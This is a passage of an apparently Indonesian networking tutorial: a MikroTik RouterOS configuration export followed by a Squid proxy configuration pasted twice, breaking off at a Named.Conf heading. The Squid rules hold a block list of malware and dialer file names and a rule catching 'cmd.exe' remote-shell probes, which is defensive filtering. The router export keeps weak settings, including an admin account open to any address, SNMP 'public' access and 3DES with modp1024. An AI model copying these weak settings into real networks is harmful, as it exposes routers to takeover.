add name=”default” auth-algorithms=sha1 enc-algorithms=3des lifetime=30m lifebytes=0 pfs-group=modp1024 disabled=no
/ ip web-proxy
set enabled=no src-address=0.0.0.0 port=3128 hostname=”proxy” transparent-proxy=no parent-proxy=0.0.0.0:0 \
cache-administrator=”webmaster” max-object-size=4096KiB cache-drive=system max-cache-size=none \
max-ram-cache-size=unlimited
/ ip web-proxy access
add dst-port=23-25 action=deny comment=”block telnet & spam e-mail relaying” disabled=no
/ ip web-proxy cache
add url=”:cgi-bin \\?” action=deny comment=”don’t cache dynamic http pages” disabled=no
/ system logging
add topics=info prefix=”” action=memory disabled=no
add topics=error prefix=”” action=memory disabled=no
add topics=warning prefix=”” action=memory disabled=no
add topics=critical prefix=”” action=echo disabled=no
/ system logging action
set memory name=”memory” target=memory memory-lines=100 memory-stop-on-full=no
set disk name=”disk” target=disk disk-lines=100 disk-stop-on-full=no
set echo name=”echo” target=echo remember=yes
set remote name=”remote” target=remote remote=0.0.0.0:514
/ system upgrade mirror
set enabled=no primary-server=0.0.0.0 secondary-server=0.0.0.0 check-interval=1d user=””
/ system clock dst
set dst-delta=+00:00 dst-start=”jan/01/1970 00:00:00″ dst-end=”jan/01/1970 00:00:00″
/ system watchdog
set reboot-on-failure=yes watch-address=none watchdog-timer=yes no-ping-delay=5m automatic-supout=yes auto-send-supout=no
/ system console
add port=serial0 term=”” disabled=no
set FIXME term=”linux” disabled=no
set FIXME term=”linux” disabled=no
set FIXME term=”linux” disabled=no
set FIXME term=”linux” disabled=no
set FIXME term=”linux” disabled=no
set FIXME term=”linux” disabled=no
set FIXME term=”linux” disabled=no
set FIXME term=”linux” disabled=no
/ system console screen
set line-count=25
/ system identity
set name=”MikroTik”
/ system note
set show-at-login=yes note=””
/ system gps
set enabled=no set-system-time=yes
/ system lcd
set enabled=no type=24×4 port=parallel contrast=0
/ system lcd page
set time display-time=5s disabled=yes
set resources display-time=5s disabled=yes
set uptime display-time=5s disabled=yes
set packets display-time=5s disabled=yes
set bits display-time=5s disabled=yes
set version display-time=5s disabled=yes
set Public display-time=5s disabled=yes
set Lan display-time=5s disabled=yes
/ system ntp server
set enabled=no broadcast=no multicast=no manycast=yes
/ system ntp client
set enabled=no mode=unicast primary-ntp=0.0.0.0 secondary-ntp=0.0.0.0
/ system routerboard bios
set
/ system health
set state-after-reboot=enabled
/ port
set serial0 name=”serial0″ baud-rate=9600 data-bits=8 parity=none stop-bits=1 flow-control=hardware
set serial1 name=”serial1″ baud-rate=9600 data-bits=8 parity=none stop-bits=1 flow-control=hardware
/ ppp profile
set default name=”default” use-compression=default use-vj-compression=default use-encryption=default only-one=default \
change-tcp-mss=yes comment=””
set default-encryption name=”default-encryption” use-compression=default use-vj-compression=default use-encryption=yes \
only-one=default change-tcp-mss=yes comment=””
/ ppp aaa
set use-radius=no accounting=yes interim-update=0s
/ queue type
set default name=”default” kind=pfifo pfifo-limit=50
set ethernet-default name=”ethernet-default” kind=pfifo pfifo-limit=50
set wireless-default name=”wireless-default” kind=sfq sfq-perturb=5 sfq-allot=1514
set synchronous-default name=”synchronous-default” kind=red red-limit=60 red-min-threshold=10 red-max-threshold=50 \
red-burst=20 red-avg-packet=1000
set hotspot-default name=”hotspot-default” kind=sfq sfq-perturb=5 sfq-allot=1514
add name=”Upload” kind=pcq pcq-rate=0 pcq-limit=50 pcq-classifier=src-address pcq-total-limit=2000
add name=”Download” kind=pcq pcq-rate=0 pcq-limit=50 pcq-classifier=dst-address pcq-total-limit=2000
add name=”default-small” kind=pfifo pfifo-limit=10
/ queue simple
add name=”HTTP” target-addresses=0.0.0.0/0 dst-address=0.0.0.0/0 interface=all parent=none packet-marks=http \
direction=both priority=1 queue=default/default limit-at=0/0 max-limit=0/0 total-queue=default disabled=no
add name=”DNS” target-addresses=0.0.0.0/0 dst-address=0.0.0.0/0 interface=all parent=none packet-marks=dns direction=both \
priority=1 queue=default/default limit-at=0/0 max-limit=0/0 total-queue=default disabled=no
add name=”YMessenger” target-addresses=0.0.0.0/0 dst-address=0.0.0.0/0 interface=all parent=none packet-marks=ym \
direction=both priority=1 queue=default/default limit-at=0/0 max-limit=0/0 total-queue=default disabled=no
add name=”CounterStrike” target-addresses=0.0.0.0/0 dst-address=0.0.0.0/0 interface=all parent=none packet-marks=cs \
direction=both priority=1 queue=default/default limit-at=0/0 max-limit=0/0 total-queue=default disabled=no
add name=”IRC” target-addresses=0.0.0.0/0 dst-address=0.0.0.0/0 interface=all parent=none packet-marks=irc direction=both \
priority=1 queue=default/default limit-at=0/0 max-limit=0/0 total-queue=default disabled=no
add name=”Mikrotik” target-addresses=0.0.0.0/0 dst-address=0.0.0.0/0 interface=all parent=none packet-marks=mt \
direction=both priority=1 queue=default/default limit-at=0/0 max-limit=0/0 total-queue=default disabled=no
add name=”Email” target-addresses=0.0.0.0/0 dst-address=0.0.0.0/0 interface=all parent=none packet-marks=email \
direction=both priority=1 queue=default/default limit-at=0/0 max-limit=0/0 total-queue=default disabled=no
add name=”Oasis” target-addresses=0.0.0.0/0 dst-address=0.0.0.0/0 interface=Lan parent=none direction=both priority=8 \
queue=ethernet-default/ethernet-default limit-at=64000/384000 max-limit=64000/384000 total-queue=default disabled=no
add name=”1″ target-addresses=192.168.0.1/32 dst-address=0.0.0.0/0 interface=Lan parent=Oasis packet-marks=test-down \
direction=both priority=8 queue=ethernet-default/ethernet-default limit-at=0/8000 max-limit=0/64000 \
total-queue=default disabled=no
add name=”2″ target-addresses=192.168.0.2/32 dst-address=0.0.0.0/0 interface=Lan parent=Oasis packet-marks=test-down \
direction=both priority=8 queue=ethernet-default/ethernet-default limit-at=0/8000 max-limit=0/64000 \
total-queue=default disabled=no
add name=”3″ target-addresses=192.168.0.3/32 dst-address=0.0.0.0/0 interface=Lan parent=Oasis packet-marks=test-down \
direction=both priority=8 queue=ethernet-default/ethernet-default limit-at=0/8000 max-limit=0/64000 \
total-queue=default disabled=no
add name=”4″ target-addresses=192.168.0.4/32 dst-address=0.0.0.0/0 interface=Lan parent=Oasis packet-marks=test-down \
direction=both priority=8 queue=ethernet-default/ethernet-default limit-at=0/8000 max-limit=0/64000 \
total-queue=default disabled=no
add name=”5″ target-addresses=192.168.0.5/32 dst-address=0.0.0.0/0 interface=Lan parent=Oasis packet-marks=test-down \
direction=both priority=8 queue=ethernet-default/ethernet-default limit-at=0/8000 max-limit=0/64000 \
total-queue=default disabled=no
add name=”6″ target-addresses=192.168.0.6/32 dst-address=0.0.0.0/0 interface=Lan parent=Oasis packet-marks=test-down \
direction=both priority=8 queue=ethernet-default/ethernet-default limit-at=0/8000 max-limit=0/64000 \
total-queue=default disabled=no
add name=”7″ target-addresses=192.168.0.7/32 dst-address=0.0.0.0/0 interface=Lan parent=Oasis packet-marks=test-down \
direction=both priority=8 queue=ethernet-default/ethernet-default limit-at=0/8000 max-limit=0/64000 \
total-queue=default disabled=no
add name=”8″ target-addresses=192.168.0.8/32 dst-address=0.0.0.0/0 interface=Lan parent=Oasis packet-marks=test-down \
direction=both priority=8 queue=ethernet-default/ethernet-default limit-at=0/8000 max-limit=0/64000 \
total-queue=default disabled=no
add name=”9″ target-addresses=192.168.0.9/32 dst-address=0.0.0.0/0 interface=Lan parent=Oasis packet-marks=test-down \
direction=both priority=8 queue=ethernet-default/ethernet-default limit-at=0/8000 max-limit=0/64000 \
total-queue=default disabled=no
add name=”10″ target-addresses=192.168.0.10/32 dst-address=0.0.0.0/0 interface=Lan parent=Oasis packet-marks=test-down \
direction=both priority=8 queue=ethernet-default/ethernet-default limit-at=0/8000 max-limit=0/64000 \
total-queue=default disabled=no
add name=”11″ target-addresses=192.168.0.11/32 dst-address=0.0.0.0/0 interface=Lan parent=Oasis packet-marks=test-down \
direction=both priority=8 queue=ethernet-default/ethernet-default limit-at=0/8000 max-limit=0/64000 \
total-queue=default disabled=no
add name=”12″ target-addresses=192.168.0.12/32 dst-address=0.0.0.0/0 interface=Lan parent=Oasis packet-marks=test-down \
direction=both priority=8 queue=ethernet-default/ethernet-default limit-at=0/8000 max-limit=0/64000 \
total-queue=default disabled=no
add name=”13″ target-addresses=192.168.0.13/32 dst-address=0.0.0.0/0 interface=Lan parent=Oasis packet-marks=test-down \
direction=both priority=8 queue=ethernet-default/ethernet-default limit-at=0/8000 max-limit=0/64000 \
total-queue=default disabled=no
add name=”14″ target-addresses=192.168.0.14/32 dst-address=0.0.0.0/0 interface=Lan parent=Oasis packet-marks=test-down \
direction=both priority=8 queue=ethernet-default/ethernet-default limit-at=0/8000 max-limit=0/64000 \
total-queue=default disabled=no
add name=”15″ target-addresses=192.168.0.15/32 dst-address=0.0.0.0/0 interface=Lan parent=Oasis packet-marks=test-down \
direction=both priority=8 queue=ethernet-default/ethernet-default limit-at=0/8000 max-limit=0/64000 \
total-queue=default disabled=no
add name=”16″ target-addresses=192.168.0.19/32 dst-address=0.0.0.0/0 interface=Lan parent=Oasis packet-marks=test-down \
direction=both priority=8 queue=ethernet-default/ethernet-default limit-at=0/8000 max-limit=0/64000 \
total-queue=default disabled=no
add name=”17″ target-addresses=192.168.0.17/32 dst-address=0.0.0.0/0 interface=Lan parent=Oasis packet-marks=test-down \
direction=both priority=8 queue=ethernet-default/ethernet-default limit-at=0/8000 max-limit=0/64000 \
total-queue=default disabled=no
add name=”18″ target-addresses=192.168.0.18/32 dst-address=0.0.0.0/0 interface=Lan parent=Oasis packet-marks=test-down \
direction=both priority=8 queue=ethernet-default/ethernet-default limit-at=0/8000 max-limit=0/64000 \
total-queue=default disabled=no
add name=”19″ target-addresses=192.168.0.19/32 dst-address=0.0.0.0/0 interface=Lan parent=Oasis packet-marks=test-down \
direction=both priority=8 queue=ethernet-default/ethernet-default limit-at=0/8000 max-limit=0/64000 \
total-queue=default disabled=no
add name=”20″ target-addresses=192.168.0.20/32 dst-address=0.0.0.0/0 interface=Lan parent=Oasis packet-marks=test-down \
direction=both priority=8 queue=ethernet-default/ethernet-default limit-at=0/8000 max-limit=0/64000 \
total-queue=default disabled=no
add name=”21″ target-addresses=192.168.0.21/32 dst-address=0.0.0.0/0 interface=Lan parent=Oasis packet-marks=test-down \
direction=both priority=8 queue=ethernet-default/ethernet-default limit-at=0/8000 max-limit=0/64000 \
total-queue=default disabled=no
add name=”22″ target-addresses=192.168.0.22/32 dst-address=0.0.0.0/0 interface=Lan parent=Oasis packet-marks=test-down \
direction=both priority=8 queue=ethernet-default/ethernet-default limit-at=0/8000 max-limit=0/64000 \
total-queue=default disabled=no
add name=”23″ target-addresses=192.168.0.23/32 dst-address=0.0.0.0/0 interface=Lan parent=Oasis packet-marks=test-down \
direction=both priority=8 queue=ethernet-default/ethernet-default limit-at=0/8000 max-limit=0/64000 \
total-queue=default disabled=no
add name=”24″ target-addresses=192.168.0.24/32 dst-address=0.0.0.0/0 interface=Lan parent=Oasis packet-marks=test-down \
direction=both priority=8 queue=ethernet-default/ethernet-default limit-at=0/8000 max-limit=0/64000 \
total-queue=default disabled=no
add name=”25″ target-addresses=192.168.0.25/32 dst-address=0.0.0.0/0 interface=Lan parent=Oasis packet-marks=test-down \
direction=both priority=8 queue=ethernet-default/ethernet-default limit-at=0/8000 max-limit=0/64000 \
total-queue=default disabled=no
add name=”26″ target-addresses=192.168.0.26/32 dst-address=0.0.0.0/0 interface=Lan parent=Oasis packet-marks=test-down \
direction=both priority=8 queue=ethernet-default/ethernet-default limit-at=0/8000 max-limit=0/64000 \
total-queue=default disabled=no
/ queue tree
add name=”upstream” parent=global-out packet-mark=test-up limit-at=384000 queue=default priority=8 max-limit=384000 \
burst-limit=0 burst-threshold=0 burst-time=0s disabled=no
add name=”downstream” parent=Lan packet-mark=test-down limit-at=384000 queue=Download priority=8 max-limit=384000 \
burst-limit=0 burst-threshold=0 burst-time=0s disabled=no
/ user
add name=”admin” group=full address=0.0.0.0/0 comment=”system default user” disabled=no
/ user group
add name=”read” policy=local,telnet,ssh,reboot,read,test,winbox,password,web,!ftp,!write,!policy
add name=”write” policy=local,telnet,ssh,reboot,read,write,test,winbox,password,web,!ftp,!policy
add name=”full” policy=local,telnet,ssh,ftp,reboot,read,write,policy,test,winbox,password,web
/ user aaa
set use-radius=no accounting=yes interim-update=0s default-group=read
/ radius incoming
set accept=yes port=1700
/ driver
/ snmp
set enabled=yes contact=”admin” location=”admin”
/ snmp community
set public name=”public” address=0.0.0.0/0 read-access=yes
/ tool bandwidth-server
set enabled=yes authenticate=yes allocate-udp-ports-from=2000 max-sessions=10
/ tool mac-server ping
set enabled=yes
/ tool e-mail
set server=0.0.0.0 from=””
/ tool sniffer
set interface=all only-headers=no memory-limit=10 file-name=”” file-limit=10 streaming-enabled=no streaming-server=0.0.0.0 \
filter-stream=yes filter-protocol=ip-only filter-address1=0.0.0.0/0:0-65535 filter-address2=0.0.0.0/0:0-65535
/ tool graphing
set store-every=5min
/ tool graphing queue
add simple-queue=all allow-address=0.0.0.0/0 store-on-disk=yes allow-target=yes disabled=no
/ tool graphing resource
add allow-address=0.0.0.0/0 store-on-disk=yes disabled=no
/ tool graphing interface
add interface=all allow-address=0.0.0.0/0 store-on-disk=yes disabled=no
/ routing ospf
set router-id=0.0.0.0 distribute-default=never redistribute-connected=no redistribute-static=no redistribute-rip=no \
redistribute-bgp=no metric-default=1 metric-connected=20 metric-static=20 metric-rip=20 metric-bgp=20
/ routing ospf area
set backbone area-id=0.0.0.0 type=default translator-role=translate-candidate authentication=none prefix-list-import=”” \
prefix-list-export=”” disabled=no
/ routing bgp
set enabled=no as=1 router-id=0.0.0.0 redistribute-static=no redistribute-connected=no redistribute-rip=no \
redistribute-ospf=no
/ routing rip
set redistribute-static=no redistribute-connected=no redistribute-ospf=no redistribute-bgp=no metric-static=1 \
metric-connected=1 metric-ospf=1 metric-bgp=1 update-timer=30s timeout-timer=3m garbage-timer=2m
[admin@MikroTik] >
2. Konfig LINUX PROXY
a. Squid.conf
http_port 8080
#icp_port 3130
icp_query_timeout 0
maximum_icp_query_timeout 5000
mcast_icp_query_timeout 2000
dead_peer_timeout 10 seconds
hierarchy_stoplist cgi-bin ? localhost
acl QUERY urlpath_regex cgi-bin \? localhost
### Opsi Cache
cache_mem 6 MB
cache_swap_low 98
cache_swap_high 99
maximum_object_size 128 MB
minimum_object_size 0 KB
maximum_object_size_in_memory 32 KB
ipcache_size 10240
ipcache_low 98
ipcache_high 99
fqdncache_size 256
cache_replacement_policy heap LFUDA
memory_replacement_policy heap GDSF
### Opsi Tuning Squid
refresh_pattern -i \.(swf|png|jpg|jpeg|bmp|tiff|png|gif) 43200 90% 129600 reload-into-ims override-lastmod
refresh_pattern -i \.(mov|mpg|mpeg|flv|avi|mp3|3gp|sis|wma) 43200 90% 129600 reload-into-ims override-lastmod
refresh_pattern -i \.(zip|rar|ace|bz|bz2|tar|gz|exe) 43200 90% 129600 reload-into-ims override-lastmod
refresh_pattern -i (.*html$|.*htm|.*shtml|.*aspx|.*asp) 43200 90% 1440 reload-into-ims override-lastmod
refresh_pattern -i \.(class|css|js|gif|jpg)$ 10080 100% 43200 override-expire
refresh_pattern -i \.(jpe|jpeg|png|bmp|tif)$ 10080 100% 43200 override-expire
refresh_pattern -i \.(tiff|mov|avi|qt|mpeg)$ 10080 100% 43200 override-expire
refresh_pattern -i \.(mpg|mpe|wav|au|mid)$ 10080 100% 43200 override-expire
refresh_pattern -i \.(zip|gz|arj|lha|lzh)$ 10080 100% 43200 override-expire
refresh_pattern -i \.(rar|tgz|tar|exe|bin)$ 10080 100% 43200 override-expire
refresh_pattern -i \.(hqx|pdf|rtf|doc|swf)$ 10080 100% 43200 override-expire
refresh_pattern -i \.(inc|cab|ad|txt|dll)$ 10080 100% 43200 override-expire
refresh_pattern -i \.(asp|acgi|pl|shtml|php3|php)$ 2 20% 4320 reload-into-ims
refresh_pattern ^http://*.google.*/.* 720 100% 4320 reload-into-ims override-lastmod
refresh_pattern ^http://*korea.*/.* 720 100% 4320 reload-into-ims override-lastmod
refresh_pattern ^http://*.akamai.*/.* 720 100% 4320 reload-into-ims override-lastmod
refresh_pattern ^http://*.windowsmedia.*/.* 720 100% 4320 reload-into-ims override-lastmod
refresh_pattern ^http://*.googlesyndication.*/.* 720 100% 4320 reload-into-ims override-lastmod
refresh_pattern ^http://*.plasa.*/.* 720 100% 4320 reload-into-ims override-lastmod
refresh_pattern ^http://*.telkom.*/.* 720 100% 4320 reload-into-ims override-lastmod
refresh_pattern ^http://www.friendster.com/.* 720 100% 4320 reload-into-ims override-lastmod
refresh_pattern ^http://mail.yahoo.com/.* 720 100% 4320 reload-into-ims override-lastmod
refresh_pattern ^http://*.yahoo.*/.* 720 100% 4320 reload-into-ims override-lastmod
refresh_pattern ^http://*.yimg.*/.* 720 100% 4320 reload-into-ims override-lastmod
refresh_pattern ^http://*.gmail.*/.* 720 100% 4320 reload-into-ims override-lastmod
refresh_pattern ^http://*.detik.*/.* 720 100% 4320 reload-into-ims override-lastmod
refresh_pattern ^gopher: 1440 0% 1440
refresh_pattern ^ftp: 43200 90% 129600 reload-into-ims override-expire
#refresh_pattern ^ftp: 1440 20% 10080
#refresh_pattern ^gopher: 1440 0% 1440
refresh_pattern . 0 20% 4320
#refresh_pattern . 180 95% 120960 reload-into-ims override-lastmod
### Direktori cache
#cache_dir aufs /cache 20000 16 256
cache_dir diskd /cache 7000 16 256 Q1=72 Q2=88
#cache_dir aufs /cache 7000 16 256
### Log
cache_access_log /var/log/squid/access.log
logfile_rotate 1
cache_log none
cache_store_log none
emulate_httpd_log off
log_ip_on_direct on
log_fqdn off
log_icp_queries off
### DNS server
dns_nameservers 127.0.0.1
quick_abort_min 0
quick_abort_max 0
quick_abort_pct 98%
negative_ttl 15 minute
positive_dns_ttl 24 hours
negative_dns_ttl 5 minutes
range_offset_limit 0 KB
### Opsi Timeout
connect_timeout 1 minute
peer_connect_timeout 5 seconds
read_timeout 30 minute
request_timeout 1 minute
#client_lifetime 10 hour
half_closed_clients off
pconn_timeout 15 second
shutdown_lifetime 15 second
### Opsi ACL
acl manager proto cache_object
acl all src 0.0.0.0/0.0.0.0
acl client src 192.168.5.0/29
acl tidakbebasdownload time 08:00-22:00
acl porn url_regex -i /usr/local/squid/etc/bokep.txt time 08:00-22:00
acl noporn url_regex -i /usr/local/squid/etc/nobokep.txt time 08:00-22:00
acl file_terlarang url_regex -i hot_indonesia.exe
acl file_terlarang url_regex -i hotsurprise_id.exe
acl file_terlarang url_regex -i best-mp3-download.exe
acl file_terlarang url_regex -i R32.exe
acl file_terlarang url_regex -i rb32.exe
acl file_terlarang url_regex -i mp3.exe
acl file_terlarang url_regex -i HOTSEX.exe
acl file_terlarang url_regex -i Browser_Plugin.exe
acl file_terlarang url_regex -i DDialer.exe
acl file_terlarang url_regex -i od-teen
acl file_terlarang url_regex -i URLDownload.exe
acl file_terlarang url_regex -i od-stnd67.exe
acl file_terlarang url_regex -i Download_Plugin.exe
acl file_terlarang url_regex -i od-teen52.exe
acl file_terlarang url_regex -i malaysex
acl file_terlarang url_regex -i edita.html
acl file_terlarang url_regex -i info.exe
acl file_terlarang url_regex -i run.exe
acl file_terlarang url_regex -i Lovers2Go
acl file_terlarang url_regex -i GlobalDialer
acl file_terlarang url_regex -i WebDialer
acl file_terlarang url_regex -i britneynude
acl file_terlarang url_regex -i download.exe
acl file_terlarang url_regex -i backup.exe
acl file_terlarang url_regex -i GnoOS2003
acl file_terlarang url_regex -i wintrim.exe
acl file_terlarang url_regex -i MPREXE.EXE
acl file_terlarang url_regex -i exengd.EXE
acl file_terlarang url_regex -i xxxvideo.exe
acl file_terlarang url_regex -i Save.exe
acl file_terlarang url_regex -i ATLBROWSER.DLL
acl file_terlarang url_regex -i NawaL_rm
acl file_terlarang url_regex -i Socks32.dll
acl file_terlarang url_regex -i Sc32Lnch.exe
acl file_terlarang url_regex -i dat0.exe
acl IIX dst_as 7713 4622 4795 7597 4787 4795 4800
acl block url_regex -i \.(aiff|asf|avi|dif|divx|mov|movie|mp3|mpe?g?|mpv2|ogg|ra?m|snd|qt|wav|wmf|wmv)$
acl local-domain dstdomain localhost
acl Bad_ports port 7 9 11 19 22 23 25 53 110 119 513 514
acl Safe_ports port 21 70 80 210 443 488 563 591 777 1025-65535
acl Virus urlpath_regex winnt/system32/cmd.exe?
acl connect method CONNECT
acl post method POST
acl ssl method CONNECT
acl purge method PURGE
acl IpAddrProbeUA browser ^Mozilla/4.0.\(compatible;.MSIE.5.5;.Windows.98\)$
acl IpAddrProbeURL url_regex //[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/$
no_cache deny QUERY manager
http_access allow manager IIX Safe_ports
http_access allow client
http_access deny porn !noporn
http_access deny Bad_ports Virus IpAddrProbeUA IpAddrProbeURL
http_access deny file_terlarang
http_access deny all
### Paramater Administratif
cache_mgr support@primadona.war.net.id
cache_effective_user squid
cache_effective_group squid
visible_hostname proxy.primadona.war.net.id
### Opsi Akselerator
memory_pools off
forwarded_for on
log_icp_queries off
icp_hit_stale on
minimum_direct_hops 4
minimum_direct_rtt 400
store_avg_object_size 13 KB
store_objects_per_bucket 20
client_db on
netdb_low 9900
netdb_high 10000
netdb_ping_period 30 seconds
query_icmp off
pipeline_prefetch on
reload_into_ims on
pipeline_prefetch on
vary_ignore_expire on
max_open_disk_fds 100
nonhierarchical_direct on
prefer_direct off
### Pendukung Transparan Proxy
httpd_accel_host virtual
httpd_accel_port 80
httpd_accel_with_proxy on
httpd_accel_uses_host_header on
### Membatasi Besar File untuk download
reply_body_max_size 3512000 allow client block tidakbebasdownload
### SNMP
#snmp_port 3401
#acl snmppublic snmp_community public
#snmp_access allow all
header_access User-Agent deny all
header_replace User-Agent Mozilla/5.0 (compatible; MSIE 6.0)
header_access Accept deny all
header_replace Accept */*
header_access Accept-Language deny all
header_replace Accept-Language id, en
http_port 8080
#icp_port 3130
icp_query_timeout 0
maximum_icp_query_timeout 5000
mcast_icp_query_timeout 2000
dead_peer_timeout 10 seconds
hierarchy_stoplist cgi-bin ? localhost
acl QUERY urlpath_regex cgi-bin \? localhost
### Opsi Cache
cache_mem 6 MB
cache_swap_low 98
cache_swap_high 99
maximum_object_size 128 MB
minimum_object_size 0 KB
maximum_object_size_in_memory 32 KB
ipcache_size 10240
ipcache_low 98
ipcache_high 99
fqdncache_size 256
cache_replacement_policy heap LFUDA
memory_replacement_policy heap GDSF
### Opsi Tuning Squid
refresh_pattern -i \.(swf|png|jpg|jpeg|bmp|tiff|png|gif) 43200 90% 129600 reload-into-ims override-lastmod
refresh_pattern -i \.(mov|mpg|mpeg|flv|avi|mp3|3gp|sis|wma) 43200 90% 129600 reload-into-ims override-lastmod
refresh_pattern -i \.(zip|rar|ace|bz|bz2|tar|gz|exe) 43200 90% 129600 reload-into-ims override-lastmod
refresh_pattern -i (.*html$|.*htm|.*shtml|.*aspx|.*asp) 43200 90% 1440 reload-into-ims override-lastmod
refresh_pattern -i \.(class|css|js|gif|jpg)$ 10080 100% 43200 override-expire
refresh_pattern -i \.(jpe|jpeg|png|bmp|tif)$ 10080 100% 43200 override-expire
refresh_pattern -i \.(tiff|mov|avi|qt|mpeg)$ 10080 100% 43200 override-expire
refresh_pattern -i \.(mpg|mpe|wav|au|mid)$ 10080 100% 43200 override-expire
refresh_pattern -i \.(zip|gz|arj|lha|lzh)$ 10080 100% 43200 override-expire
refresh_pattern -i \.(rar|tgz|tar|exe|bin)$ 10080 100% 43200 override-expire
refresh_pattern -i \.(hqx|pdf|rtf|doc|swf)$ 10080 100% 43200 override-expire
refresh_pattern -i \.(inc|cab|ad|txt|dll)$ 10080 100% 43200 override-expire
refresh_pattern -i \.(asp|acgi|pl|shtml|php3|php)$ 2 20% 4320 reload-into-ims
refresh_pattern ^http://*.google.*/.* 720 100% 4320 reload-into-ims override-lastmod
refresh_pattern ^http://*korea.*/.* 720 100% 4320 reload-into-ims override-lastmod
refresh_pattern ^http://*.akamai.*/.* 720 100% 4320 reload-into-ims override-lastmod
refresh_pattern ^http://*.windowsmedia.*/.* 720 100% 4320 reload-into-ims override-lastmod
refresh_pattern ^http://*.googlesyndication.*/.* 720 100% 4320 reload-into-ims override-lastmod
refresh_pattern ^http://*.plasa.*/.* 720 100% 4320 reload-into-ims override-lastmod
refresh_pattern ^http://*.telkom.*/.* 720 100% 4320 reload-into-ims override-lastmod
refresh_pattern ^http://www.friendster.com/.* 720 100% 4320 reload-into-ims override-lastmod
refresh_pattern ^http://mail.yahoo.com/.* 720 100% 4320 reload-into-ims override-lastmod
refresh_pattern ^http://*.yahoo.*/.* 720 100% 4320 reload-into-ims override-lastmod
refresh_pattern ^http://*.yimg.*/.* 720 100% 4320 reload-into-ims override-lastmod
refresh_pattern ^http://*.gmail.*/.* 720 100% 4320 reload-into-ims override-lastmod
refresh_pattern ^http://*.detik.*/.* 720 100% 4320 reload-into-ims override-lastmod
refresh_pattern ^gopher: 1440 0% 1440
refresh_pattern ^ftp: 43200 90% 129600 reload-into-ims override-expire
#refresh_pattern ^ftp: 1440 20% 10080
#refresh_pattern ^gopher: 1440 0% 1440
refresh_pattern . 0 20% 4320
#refresh_pattern . 180 95% 120960 reload-into-ims override-lastmod
### Direktori cache
#cache_dir aufs /cache 20000 16 256
cache_dir diskd /cache 7000 16 256 Q1=72 Q2=88
#cache_dir aufs /cache 7000 16 256
### Log
cache_access_log /var/log/squid/access.log
logfile_rotate 1
cache_log none
cache_store_log none
emulate_httpd_log off
log_ip_on_direct on
log_fqdn off
log_icp_queries off
### DNS server
dns_nameservers 127.0.0.1
quick_abort_min 0
quick_abort_max 0
quick_abort_pct 98%
negative_ttl 15 minute
positive_dns_ttl 24 hours
negative_dns_ttl 5 minutes
range_offset_limit 0 KB
### Opsi Timeout
connect_timeout 1 minute
peer_connect_timeout 5 seconds
read_timeout 30 minute
request_timeout 1 minute
#client_lifetime 10 hour
half_closed_clients off
pconn_timeout 15 second
shutdown_lifetime 15 second
### Opsi ACL
acl manager proto cache_object
acl all src 0.0.0.0/0.0.0.0
acl client src 192.168.5.0/29
acl tidakbebasdownload time 08:00-22:00
acl porn url_regex -i /usr/local/squid/etc/bokep.txt time 08:00-22:00
acl noporn url_regex -i /usr/local/squid/etc/nobokep.txt time 08:00-22:00
acl file_terlarang url_regex -i hot_indonesia.exe
acl file_terlarang url_regex -i hotsurprise_id.exe
acl file_terlarang url_regex -i best-mp3-download.exe
acl file_terlarang url_regex -i R32.exe
acl file_terlarang url_regex -i rb32.exe
acl file_terlarang url_regex -i mp3.exe
acl file_terlarang url_regex -i HOTSEX.exe
acl file_terlarang url_regex -i Browser_Plugin.exe
acl file_terlarang url_regex -i DDialer.exe
acl file_terlarang url_regex -i od-teen
acl file_terlarang url_regex -i URLDownload.exe
acl file_terlarang url_regex -i od-stnd67.exe
acl file_terlarang url_regex -i Download_Plugin.exe
acl file_terlarang url_regex -i od-teen52.exe
acl file_terlarang url_regex -i malaysex
acl file_terlarang url_regex -i edita.html
acl file_terlarang url_regex -i info.exe
acl file_terlarang url_regex -i run.exe
acl file_terlarang url_regex -i Lovers2Go
acl file_terlarang url_regex -i GlobalDialer
acl file_terlarang url_regex -i WebDialer
acl file_terlarang url_regex -i britneynude
acl file_terlarang url_regex -i download.exe
acl file_terlarang url_regex -i backup.exe
acl file_terlarang url_regex -i GnoOS2003
acl file_terlarang url_regex -i wintrim.exe
acl file_terlarang url_regex -i MPREXE.EXE
acl file_terlarang url_regex -i exengd.EXE
acl file_terlarang url_regex -i xxxvideo.exe
acl file_terlarang url_regex -i Save.exe
acl file_terlarang url_regex -i ATLBROWSER.DLL
acl file_terlarang url_regex -i NawaL_rm
acl file_terlarang url_regex -i Socks32.dll
acl file_terlarang url_regex -i Sc32Lnch.exe
acl file_terlarang url_regex -i dat0.exe
acl IIX dst_as 7713 4622 4795 7597 4787 4795 4800
acl block url_regex -i \.(aiff|asf|avi|dif|divx|mov|movie|mp3|mpe?g?|mpv2|ogg|ra?m|snd|qt|wav|wmf|wmv)$
acl local-domain dstdomain localhost
acl Bad_ports port 7 9 11 19 22 23 25 53 110 119 513 514
acl Safe_ports port 21 70 80 210 443 488 563 591 777 1025-65535
acl Virus urlpath_regex winnt/system32/cmd.exe?
acl connect method CONNECT
acl post method POST
acl ssl method CONNECT
acl purge method PURGE
acl IpAddrProbeUA browser ^Mozilla/4.0.\(compatible;.MSIE.5.5;.Windows.98\)$
acl IpAddrProbeURL url_regex //[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/$
no_cache deny QUERY manager
http_access allow manager IIX Safe_ports
http_access allow client
http_access deny porn !noporn
http_access deny Bad_ports Virus IpAddrProbeUA IpAddrProbeURL
http_access deny file_terlarang
http_access deny all
### Paramater Administratif
cache_mgr support@primadona.war.net.id
cache_effective_user squid
cache_effective_group squid
visible_hostname proxy.primadona.war.net.id
### Opsi Akselerator
memory_pools off
forwarded_for on
log_icp_queries off
icp_hit_stale on
minimum_direct_hops 4
minimum_direct_rtt 400
store_avg_object_size 13 KB
store_objects_per_bucket 20
client_db on
netdb_low 9900
netdb_high 10000
netdb_ping_period 30 seconds
query_icmp off
pipeline_prefetch on
reload_into_ims on
pipeline_prefetch on
vary_ignore_expire on
max_open_disk_fds 100
nonhierarchical_direct on
prefer_direct off
### Pendukung Transparan Proxy
httpd_accel_host virtual
httpd_accel_port 80
httpd_accel_with_proxy on
httpd_accel_uses_host_header on
### Membatasi Besar File untuk download
reply_body_max_size 3512000 allow client block tidakbebasdownload
### SNMP
#snmp_port 3401
#acl snmppublic snmp_community public
#snmp_access allow all
header_access User-Agent deny all
header_replace User-Agent Mozilla/5.0 (compatible; MSIE 6.0)
header_access Accept deny all
header_replace Accept */*
header_access Accept-Language deny all
header_replace Accept-Language id, en
b. Named.Conf
//
